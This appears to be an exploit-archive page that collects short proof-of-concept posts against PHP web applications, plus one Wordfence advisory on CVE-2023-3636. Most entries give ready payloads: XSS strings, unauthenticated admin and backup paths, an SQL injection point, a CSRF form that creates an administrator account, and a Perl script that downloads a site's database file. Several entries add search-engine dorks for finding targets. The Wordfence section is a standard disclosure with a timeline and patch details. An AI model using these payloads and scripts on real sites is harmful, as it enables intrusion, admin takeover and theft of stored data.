<pre><code>====================================================================================================================================<br />| # Title : Easy Web Portal v2.1.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://www.p30vel.ir |<br />| # Dork : EWP a été construit avec Easy Web Portal v2.1.1 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This vulnerability affects /tst/index.php .<br /><br />[+] URL encoded GET input admin was set to 0' onmouseover=prompt(976752) bad='<br /><br />[+] The input is reflected inside a tag parameter between single quotes.<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Easy Password Manager v1.1 unauthorized administrative access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://codelist.cc/scripts/247302-password-manager-for-rise-crm-v11.html | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] unauthorized access allows you to export all E-mail group .<br /><br />[+] Use Payload : /export-all-mail-group-csv.php<br /><br />[+] https://127.0.0.1/mother-of-mangrovecom/xicia/cc/epm/export-all-mail-group-csv.php<br /> <br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Easy Member pro v3.0 Unauthorised Administrative Access Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |<br />| # Vendor : https://easymemberpro30review.weebly.com/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] allows for unauthorized administrative access , Causes partial control of the site control panel<br /><br />[+] use payload : 1 - /admin/memberleft.php<br /> <br /> 2 - /admin/lefthome.php<br /><br />[+] http://127.0.0.1/easymemberprocom/admin/memberleft.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2 | <br />| # Dork : "Copyright © DigaSell All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2<br /> <br />[+] Panel : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Deprixa 3.2.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/ | <br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 11.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /dashboard/settings/addusersadmin/agregar.php.<br /><br /> <!-- Modal nuevo usuario --><br /> <div class="modal fade" id="nuevo" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"><br /> <div class="modal-dialog"><br /> <div class="modal-content"><br /> <div class="modal-header"><br /> <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button><br /> <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4><br /> </div><br /> <div class="modal-body"><br /> <!--Cuerpo del modal aquí el formulario--><br /> <form action="https://127.0.0.1/deprixalogisticsonline/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate novalidate method="post" class="form-horizontal" enctype="multipart/form-data"><br /> <div class="form-group " id="gnombrepa"><br /> <label for="off_name" class="col-sm-2 control-label"></label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control off_name" parsley-trigger="change" required name="name_parson" placeholder="Administrator Name"><br /> </div><br /> </div><br /> <div class="form-group" id="gapellido"><br /> <label for="email" class="col-sm-2 control-label">Email</label><br /> <div class="col-sm-5"><br /> <input type="text" class="form-control email" name="email" id="id_mail" placeholder="demo@demo.com" required onKeyUp="javascript:validateMail('id_mail')"><br /> <strong><span id="emailOK"></span></strong><br /> <p class="error"></p><br /> </div><br /> <div class="col-sm-5"><br /> <input class="form-control phone" name="phone" parsley-trigger="change" required placeholder="Phone"> <br /> </div><br /> </div><br /> <div class="form-group" id="gemail"><br /> <label for="office" class="col-sm-2 control-label">Office</label><br /> <div class="col-sm-5"><br /> <input type="text" class="form-control office" parsley-trigger="change" required name="office" placeholder="Name of the Office"><br /> </div><br /> <div class="col-sm-5"><br /> <select type="text" class="form-control role" name="role" ><br /> <option value="Administrator">Administrator</option> <br /> </select><br /> </div><br /> </div><br /> <div class="form-group " id="gnombre"><br /> <label for="off_name" class="col-sm-2 control-label">User</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control off_name" parsley-trigger="change" required name="name" placeholder="Username"><br /> </div><br /> </div><br /> <div class="form-group" id="gpassword"><br /> <label for="pwd" class="col-sm-2 control-label">Password</label><br /> <div class="col-sm-10"><br /> <input type="text" class="form-control pwd" parsley-trigger="change" required name="pwd" placeholder="Password"><br /> </div><br /> </div><br /> </br></br><br /> <div class="col-sm-offset-2 col-sm-10"><br /> <div class="checkbox"><br /> <label class="i-checks i-checks-sm"><br /> <input type="checkbox" name="estado" value="1" onclick="return false" checked ><br /> <i></i><br /> State </label><br /> </div><br /> <div class="checkbox"><br /> <label class="i-checks i-checks-sm"><br /> <input type="checkbox" name="type" value="a" onclick="return false" checked ><br /> <i></i><br /> User Type </label><br /> </div><br /> </div><br /> <br /> <!--Fin del cuerpo del modal--><br /> </div><br /> </br></br><br /> <div class="modal-footer"><br /> <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i><br /> Close</button><br /> <input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save"><br /> </div><br /> </form> <br /> </div><br /> </div><br /> </div><br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Description: WP Project Manager <= 2.6.4 – Arbitrary Usermeta Update to Authenticated (Subscriber+) Privilege Escalation <br /><br />Affected Plugin: WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts<br /><br />Plugin Slug: wedevs-project-manager<br /><br />Affected Versions: <= 2.6.4<br /><br />CVE ID: CVE-2023-3636<br /><br />CVSS Score: 8.8 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Lana Codes and Chloe Chamberland <br /><br />Fully Patched Version: 2.6.5<br /><br />The WP Project Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.6.4 due to insufficient restriction on the ‘save_users_map_name’ function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the ‘usernames’ parameter.<br /><br />Technical Analysis<br /><br />WP Project Manager plugin is a task, project, and team management tool for WordPress. Upon closer examination of the code, we see that there is an API endpoint, the ‘save_users_map_name’ function, which updates a user’s github and bitbucket username.<br /><br />[View this code snippet on the blog.] <br /><br />The most significant problem and vulnerability is caused by the way the explode() and in_array() functions are used to ensure that only the ‘github’ and ‘bitbucket’ meta values can be updated. Unfortunately, these functions are not sufficient to prevent exploitation, because they can be bypassed with a special character, known as a homoglyph, that acts like an underscore, however, won’t be properly “exploded” but will be saved in the database as a proper underscore.<br /><br />This made it possible for authenticated users, such as subscribers, to supply the ‘wp_capabilities’ array parameter with any desired role, such as administrator, when updating what should be username metadata, which would grant the user access to capabilities based on that role.<br /><br />As with any Privilege Escalation vulnerability, this can be used for complete site compromise. Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modifying posts and pages which can be leveraged to redirect site users to other malicious sites.<br /><br />Disclosure Timeline<br /><br />July 9, 2023 – Discovery of the Privilege Escalation vulnerability in WP Project Manager.<br /><br />July 11, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />July 13, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />July 16, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />July 16, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />July 24, 2023 – A fully patched version of the plugin, 2.6.5, is released.<br /><br />August 12, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we detailed a Privilege Escalation vulnerability within the WP Project Manager plugin affecting versions 2.6.4 and earlier. This vulnerability allows authenticated threat actors with subscriber-level permissions or higher to elevate their privileges to those of a site administrator which could ultimately lead to complete site compromise. The vulnerability has been fully addressed in version 2.6.5 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of WP Project Manager.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on July 13, 2023. Sites still using the free version of Wordfence will receive the same protection on August 12, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Dynamic Journal cms v2.5 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://ToastForums.com | <br />| # Dork : |<br />====================================================================================================================================<br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb ) file<br /> The (acart.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># Dynamic Journal cms v2.5 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('Dynamic Journal cms v2.5 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : e2 distr CMS v2.8.5.3 Backup Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://blogengine.ru/ |<br />| # Dork : © Blog author, 2014 Powered by Aegea |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to leave backups in a world accessible directory under the document root.<br /><br />[+] Use Payload : /e2/user/backup/<br /><br />[+] http://127.0.0.1/e2/user/backup/ <br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DriverPack Solution CMS v 17.11.108 Xss Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://driverpack.io/ | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb<br /><br />[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : DMIS:CRI LMS V2.0 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0.1(64-bit) | <br />| # Vendor : http://dmis.cri2.go.th/ | <br />| # Dork : ระบบฐานข้อมูลสารสนเทศเพื่อการบริหารจัดการศึกษา สำนักงานเขตพื้นที่การศึกษาประถมศึกษาเชียงราย เขต 2 |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : http://127.0.0.1/dmiscri2goth/school_detail.php?sid=15 <=== inject here<br /><br />[+] http://127.0.0.1/dmiscri2.goth/manage/profileshow.php <=== Panel<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
Archives
Categories
- All Exploits 4105
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow